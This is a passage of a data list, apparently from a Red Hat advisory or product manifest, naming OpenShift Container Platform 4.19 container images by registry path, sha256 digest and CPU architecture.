"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
